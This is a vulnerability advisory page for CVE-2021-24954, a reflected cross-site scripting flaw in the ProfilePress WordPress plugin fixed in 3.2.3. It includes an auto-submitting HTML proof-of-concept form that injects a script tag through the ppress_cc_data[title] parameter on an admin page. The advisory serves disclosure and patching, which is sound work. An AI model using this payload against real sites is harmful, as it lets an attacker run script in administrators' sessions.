WordPress Plugin Vulnerabilities

ProfilePress < 3.2.3 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the ppress_cc_data parameter before outputting it back in an attribute of an admin dashboard page, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=pp-content-protection&add=1" id="hack" method="POST">
      <input type="hidden" name="ppress_cc_data[title]" value='"><script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>

Affects Plugins

Plugin icon
wp-user-avatar
Fixed in 3.2.3

References

CVE
CVE-2021-24954
URL
https://plugins.trac.wordpress.org/changeset/2626573/

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.8 (high)

Miscellaneous

Original Researcher
ZhongFu Su(JrXnm) of Wuhan University
Submitter
ZhongFu Su(JrXnm) of Wuhan University
Submitter website
https://blog.szfszf.top
Submitter twitter
JrXnm
Verified
Yes
WPVDB ID
54ff0db8-1d9e-4e67-b71a-142a9e5ed851

Timeline

Publicly Published
2021-11-15 (about 2 years ago)
Added
2021-11-15 (about 2 years ago)
Last Updated
2022-09-26 (about 1 years ago)

Other

Published
Title
Published
2021-06-07
Title
Stripe Payment Gateway for WooCommerce < 3.6.0 - Reflected Cross-Site Scripting (XSS)
Published
2023-06-16
Title
Sermon'e – Sermons Online <= 1.0.0 - Contributor+ Stored XSS
Published
2014-08-01
Title
Eunice - Unspecified XSS
Published
2022-09-19
Title
reSmush.it Image Optimizer < 0.4.6 - Admin+ Cross-Site Scripting
Published
2023-11-06
Title
Webpushr < 4.35.0 - Unauthenticated Stored XSS